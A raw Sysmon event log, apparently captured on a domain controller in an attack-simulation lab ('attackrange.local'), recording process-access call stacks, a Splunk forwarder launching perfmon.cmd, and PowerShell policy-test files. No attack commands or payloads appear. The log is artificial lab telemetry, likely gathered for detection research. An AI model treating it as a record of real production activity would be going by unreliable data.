09:20:22.567{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD6-6151-6A00-00000000FD01}4016C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054216Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.567{5EBD8912-8CBD-6151-0B00-00000000FD01}6402908C:\Windows\system32\lsass.exe{5EBD8912-8CD6-6151-6900-00000000FD01}3836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054215Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.567{5EBD8912-8CBD-6151-0B00-00000000FD01}6402908C:\Windows\system32\lsass.exe{5EBD8912-8CD6-6151-6900-00000000FD01}3836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054214Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.567{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054213Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.567{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054212Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.567{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054211Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.567{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054210Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.567{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054209Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.567{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054208Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.567{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054207Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.567{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054206Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.567{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054205Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.567{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8CD6-6151-6A00-00000000FD01}4016C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054204Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.567{5EBD8912-8CD0-6151-3000-00000000FD01}19563432C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8CD6-6151-6A00-00000000FD01}4016C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054203Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.569{5EBD8912-8CD6-6151-6A00-00000000FD01}4016C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\perfmon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 17141700x80000000000000001054202Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:20:22.551{5EBD8912-8CD6-6151-6900-00000000FD01}3836\PSHost.132772080224922075.3836.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001054201Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.535{5EBD8912-8CD6-6151-6900-00000000FD01}3836NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_mlv2dj2t.iua.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054200Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.535{5EBD8912-8CD6-6151-6900-00000000FD01}3836NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_2oo1qoq2.fyq.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001054199Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.520{5EBD8912-8CD6-6151-6900-00000000FD01}3836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_2oo1qoq2.fyq.ps12021-09-27 09:20:22.520 10341000x80000000000000001054198Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.520{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD6-6151-6900-00000000FD01}3836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054197Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.494{5EBD8912-8CD2-6151-4700-00000000FD01}38483868C:\Windows\system32\conhost.exe{5EBD8912-8CD6-6151-6900-00000000FD01}3836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054196Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.493{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054195Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.493{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054194Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.493{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054193Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.492{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054192Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.492{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054191Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.492{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054190Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.492{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054189Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 